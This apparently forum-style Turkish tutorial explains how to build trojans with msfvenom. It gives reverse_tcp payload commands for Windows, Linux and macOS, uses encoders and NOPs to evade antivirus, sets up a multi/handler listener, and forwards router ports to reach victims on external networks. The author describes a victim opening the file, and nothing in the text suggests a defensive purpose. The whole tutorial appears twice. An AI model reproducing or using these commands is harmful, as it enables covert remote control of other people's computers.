Bu konuya başlamadan önce önemli bir konuya deyiniceğim...
Kali Linux'a Statik (Sabit) İp.
Oluşturduğumuz Trojan'ın kurban açtıktan sonra bizim ip mizin değişmesi büyük bir sorun olur o yüzden bu işlemi yapıyoruz.
Video link:
Bu işlemi yaptıktan sonra msfvenomun kullanımına geçe biliriz...
Lokal ağda trojan oluşturup diğer lokal ağdaki bilgisayarda kullanılması için port açmamız gerekmez.
Windows için...
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f exe > (dosyanınismi.exe)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek bu encoder(e),nops(n)
encoderları görmek için msfvenom -l encoders
nops kullanımı ise -n (yazdığımız değer kadar boyutu artar)
msfvenom -p windows/meterpreter/reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=(ipniz) LPORT=(port) -f exe > (dosyaismi.exe)
Linux için...
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek
msfvenom -p linux/meterpreter/reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
macOS için...
msvenom -p osx/x86/shell_reverse_tcp LHOST=ipniz) LPORT=(port) -f macho > (isim. macho)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek.
msvenom -p osx/x86/shell_reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=ipniz) LPORT=(port) -f macho > (isim. macho)
Oluşturduktan sonra bunlar dinlemeye almamız gerekiyor.
2 yöntem kullana biliriz msfconsole komut ekranında kullanılanı bir diğeri msfconsole
Görsel versiyonu.(Armitage) 2. yöntemi anlatmayacağım üşendim
1. yöntem msfconsole...
msfconsole yazıp çalıştırıyoruz ardından
use exploit/multi/handler
set payload (kullandığımız payload)
show options diyip istenilen bilgileri görüyoruz ardından
set LHOST (ipniz)
set LPORT (seçtiğiniz port)
run diyip dinlemeye alıyoruz
Dış ağda çalışan Trojan'ı oluşturmak için üsteki yapılanlardan tek fark LHOST
LHOST=(Google my ip yazıp ilk siteye gir ordaki ip kopyala bu bizim dış ipmiz)
Ör:
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(Google my ip yazıp ilk siteye gir ordaki ip kopyala bu bizim dış ipmiz) LPORT=(port) -f elf > (isim.elf)
Oluşturduktan sonra...
Dış ağ için modem arayüzüne giriyoruz...
İletim
Sanal sunucu
Yeni ekle
Port ekliyoruz ve LPORTa yazdığımız portu açıyoruz. (anlamazsanız internetten port açmaya bakarsınız)
Sonra önceki gibi.
dinlemeye alıyoruz.
msfconsole yazıp çalıştırıyoruz ardından...
use exploit/multi/handler
set payload (kullandığımız payload)
show options diyip istenilen bilgileri görüyoruz ardından
set LHOST (ipniz)
set LPORT (seçtiğiniz port)
run diyip dinlemeye alıyoruz
Kali Linux'a Statik (Sabit) İp.
Oluşturduğumuz Trojan'ın kurban açtıktan sonra bizim ip mizin değişmesi büyük bir sorun olur o yüzden bu işlemi yapıyoruz.
Video link:
Lokal ağda trojan oluşturup diğer lokal ağdaki bilgisayarda kullanılması için port açmamız gerekmez.
Windows için...
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f exe > (dosyanınismi.exe)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek bu encoder(e),nops(n)
encoderları görmek için msfvenom -l encoders
nops kullanımı ise -n (yazdığımız değer kadar boyutu artar)
msfvenom -p windows/meterpreter/reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=(ipniz) LPORT=(port) -f exe > (dosyaismi.exe)
Linux için...
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek
msfvenom -p linux/meterpreter/reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(ipniz) LPORT=(port) -f elf > (isim.elf)
macOS için...
msvenom -p osx/x86/shell_reverse_tcp LHOST=ipniz) LPORT=(port) -f macho > (isim. macho)
Virüs programlarının anlamamasını sağlamaya çalışmak istersek.
msvenom -p osx/x86/shell_reverse_tcp -e (eklene bilir) -i (değiştirile bilir) -n (değiştirile bilir ) LHOST=ipniz) LPORT=(port) -f macho > (isim. macho)
Oluşturduktan sonra bunlar dinlemeye almamız gerekiyor.
2 yöntem kullana biliriz msfconsole komut ekranında kullanılanı bir diğeri msfconsole
Görsel versiyonu.(Armitage) 2. yöntemi anlatmayacağım üşendim
1. yöntem msfconsole...
msfconsole yazıp çalıştırıyoruz ardından
use exploit/multi/handler
set payload (kullandığımız payload)
show options diyip istenilen bilgileri görüyoruz ardından
set LHOST (ipniz)
set LPORT (seçtiğiniz port)
run diyip dinlemeye alıyoruz
Dış ağda çalışan Trojan'ı oluşturmak için üsteki yapılanlardan tek fark LHOST
LHOST=(Google my ip yazıp ilk siteye gir ordaki ip kopyala bu bizim dış ipmiz)
Ör:
msfvenom -p linux/meterpreter/reverse_tcp LHOST=(Google my ip yazıp ilk siteye gir ordaki ip kopyala bu bizim dış ipmiz) LPORT=(port) -f elf > (isim.elf)
Oluşturduktan sonra...
Dış ağ için modem arayüzüne giriyoruz...
İletim
Sanal sunucu
Yeni ekle
Port ekliyoruz ve LPORTa yazdığımız portu açıyoruz. (anlamazsanız internetten port açmaya bakarsınız)
Sonra önceki gibi.
dinlemeye alıyoruz.
msfconsole yazıp çalıştırıyoruz ardından...
use exploit/multi/handler
set payload (kullandığımız payload)
show options diyip istenilen bilgileri görüyoruz ardından
set LHOST (ipniz)
set LPORT (seçtiğiniz port)
run diyip dinlemeye alıyoruz
